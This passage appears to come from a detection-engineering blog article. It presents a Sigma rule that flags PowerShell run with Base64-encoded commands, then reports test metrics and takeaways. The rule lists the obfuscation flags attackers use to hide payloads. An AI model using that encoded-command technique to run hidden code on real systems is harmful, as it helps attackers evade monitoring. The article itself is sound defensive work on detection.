During a purple teaming exercise, the Red Team successfully executes a malicious payload using PowerShell with a Base64-encoded command (-EncodedCommand). The attack goes undetected by existing detections because they only searched for specific known PowerShell command strings, not the generic encoding pattern.

Step 1: Hypothesis and Analysis

The detection engineer formulates the hypothesis: "Any use of PowerShell -EncodedCommand in an enterprise environment should be considered suspicious, because legitimate software rarely needs to encode its own commands." Analysis of the past 30 days of logs confirms: out of 50,000 PowerShell executions, only 12 use -EncodedCommand, and all are attributable to a known IT automation script.

Step 2: Sigma Rule

Sigma Rule - PowerShell Encoded Command Execution

title: Suspicious PowerShell Encoded Command Execution
id: f4a3b2c1-d5e6-7890-abcd-ef0123456789
status: test
description: |
  Detects execution of PowerShell with encoded commands (-enc,
  -EncodedCommand). Legitimate use is rare in enterprise environments.
  Attackers commonly use this to obfuscate malicious payloads.
author: Federico Calo
date: 2025/12/01
modified: 2025/12/15
references:
  - https://attack.mitre.org/techniques/T1059/001/
  - https://attack.mitre.org/techniques/T1027/010/
logsource:
  category: process_creation
  product: windows
detection:
  selection_powershell:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_encoded:
    CommandLine|contains:
      - '-enc '
      - '-EncodedCommand'
      - '-encodedcommand'
      - '-ec '
  filter_known_automation:
    ParentImage|endswith: '\sccm_agent.exe'
    User|contains: 'SVC_AUTOMATION'
  condition: selection_powershell and selection_encoded and not filter_known_automation
falsepositives:
  - SCCM automation scripts (filtered)
  - Custom IT automation using encoded commands (add to filter)
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1027.010

Step 3: Test, Deploy, and Results

The rule is tested with 5 true positive scenarios (encoded command variants) and 20 false negative scenarios (legitimate PowerShell executions). After deployment via CI/CD pipeline, in the first 30 days the detection generates 8 alerts: 6 true positives (suspicious scripts to analyze), 1 false positive (new automation script to add to the filter), and 1 critical true positive that leads to discovering an unauthorized access.

Measurable Results

Precision: 87.5% (7 TP out of 8 total alerts)
MTTD: reduced from "undetected" to 4.2 minutes (average alert generation time)
ATT&CK Coverage: +2 techniques (T1059.001, T1027.010) added to the map
Real impact: 1 active compromise discovered and contained within 45 minutes

Conclusions and Next Steps

Detection Engineering represents a fundamental paradigm shift in operational security. It is not simply about writing better rules in the SIEM, but about building a complete engineering process that embraces the entire detection lifecycle: from threat hypothesis to production validation.

Key takeaways to remember:

Quality beats quantity - 50 high-fidelity detections are infinitely more useful than 5,000 rules generating alert noise.
Treat detections as code - Versioning, code review, automated testing, and CI/CD pipelines are not optional, they are fundamental.
Measure everything - MTTD, MTTR, precision, recall, ATT&CK coverage. Without metrics, continuous improvement is impossible.
Start from the technique - Map detections to MITRE ATT&CK and focus resources on the techniques most relevant to your organization.
Invest in data quality - A perfect detection is useless without the data to operate on. Normalization and log source onboarding are the invisible foundation of the entire program.

In the Next Article

In the next article in this series, we will dive deep into Sigma rules: the standard format for writing portable detections. We will cover the complete syntax, advanced modifiers, conversion backends for major SIEMs, and build a complete set of rules for the most critical ATT&CK techniques.